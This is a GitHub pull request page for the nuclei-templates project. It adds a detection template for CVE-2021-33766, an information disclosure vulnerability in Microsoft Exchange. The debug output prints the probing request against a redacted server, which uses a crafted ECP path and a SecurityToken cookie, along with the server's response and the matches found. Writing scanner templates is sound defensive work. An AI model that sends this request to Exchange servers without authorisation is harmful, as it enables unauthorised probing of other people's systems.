Skip to content

Add CVE-2021-33766 (KEV and vKEV) #13532

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Closed
wants to merge 1 commit into from
Closed

Add CVE-2021-33766 (KEV and vKEV) #13532

wants to merge 1 commit into from

Conversation

@daffainfo
Copy link
Contributor

@daffainfo daffainfo commented Oct 9, 2025

Template / PR Information

Microsoft Exchange Server Information Disclosure Vulnerability

Template Validation

I've validated this template locally?

  • YES
  • NO

Debug


                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.3.0 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 124
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] [CVE-2021-33766] Dumped HTTP request for https://REDACTED/ecp/[email protected]/PersonalSettings/HomePage.aspx?showhelp=false

GET /ecp/[email protected]/PersonalSettings/HomePage.aspx?showhelp=false HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Cookie: SecurityToken=x
Accept-Encoding: gzip

[DBG] [CVE-2021-33766] Dumped HTTP response https://REDACTED/ecp/[email protected]/PersonalSettings/HomePage.aspx?showhelp=false

HTTP/1.1 403 Forbidden
Connection: close
Transfer-Encoding: chunked
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Thu, 09 Oct 2025 16:28:38 GMT
X-Ecp-Error: Microsoft.Exchange.Data.Storage.ObjectNotFoundException
...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- Copyright (c) 2007 Microsoft Corporation.  All rights reserved. -->
<!-- {6DD23A7E-5C94-4d52-B537-2EA53079B2D5} -->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="zh-CN">

        <head id="Head1"><meta http-equiv="Content-Type" content="text/html;&#32;CHARSET=utf-8" /><meta content="MSHTML&#32;6.00.5730.11" name="GENERATOR" />
                <link rel="shortcut icon" href="/ecp/15.1.1847.3/themes/default/favicon.ico" type="image/x-icon" />
        <link href="/ecp/15.1.1847.3/themes/default/main_zhs.css" type="text/css" rel="stylesheet" /><title>
        Outlook - 注销
</title></head>

        <body scroll="no">
        <div class="errorMainDiv">
            <img class="&#32;CommonSprite&#32;OutlookLogo" title="Outlook" src="/ecp/15.1.1847.3/themes/default/clear1x1.gif" alt="Outlook" />

            <div class="errorMessageContainer">
                <div class="errorHeader"><span id="msgCode">403</span></div>
                <div class="errorSubHeader"><span id="msgTitle">&#25298;&#32477;&#35775;&#38382; :(</span></div>
                <div class="errorDetails">
                    <div class="errorMsg">您必须登录到您的帐户才能打开此页面。如果您没有此 Microsoft 服务的帐户,请联系您的电子邮件管理员。</div>
                    
                </div>

                <!-- cause:{FEE4FCBB-25E7-4e14-95CA-015FE48F44F1} -->
            </div>

            <div class="errorFooter">
                <img class="&#32;CommonSprite&#32;OfficeLogo" title="Office" src="/ecp/15.1.1847.3/themes/default/clear1x1.gif" alt="Office" />
            </div>
        </div>
        <script>
            function signOut() {
                var url =
                    window.location.protocol +
                    "//" +
                    window.location.hostname +
                    ((window.location.port == "") ? "" : ":" + window.location.port) +
                    "";

                window.location.href = "logoff.aspx?src=exch&url=" + url;
            }

            function showHideMoreInfo() {
                var moreInfo = document.getElementById("moreInfo");
                if (moreInfo.style.display == "none")
                    moreInfo.style.display = "block";
                else
                    moreInfo.style.display = "none";
            }
        </script>
        </body>
</html>
[CVE-2021-33766:word-1] [http] [high] https://REDACTED/ecp/[email protected]/PersonalSettings/HomePage.aspx?showhelp=false
[CVE-2021-33766:word-2] [http] [high] https://REDACTED/ecp/[email protected]/PersonalSettings/HomePage.aspx?showhelp=false
[CVE-2021-33766:status-3] [http] [high] https://REDACTED/ecp/[email protected]/PersonalSettings/HomePage.aspx?showhelp=false
[INF] Scan completed in 580.681083ms. 3 matches found.

@github-actions github-actions bot requested a review from pussycat0x October 9, 2025 16:33
@Akokonunes
Copy link
Contributor

Akokonunes commented Oct 9, 2025

Hello @daffainfo ,

Thank you so much for sharing this template with the community and contributing to the project. We'll be reviewing this PR shortly.

@Akokonunes Akokonunes added the Done Ready to merge label Oct 9, 2025
@daffainfo daffainfo closed this by deleting the head repository Oct 10, 2025
@daffainfo daffainfo mentioned this pull request Oct 10, 2025
Merged
2 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@pussycat0x pussycat0x Awaiting requested review from pussycat0x

Assignees

@Akokonunes Akokonunes

Labels

Done Ready to merge Hacktoberfest

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@daffainfo @Akokonunes @DhiyaneshGeek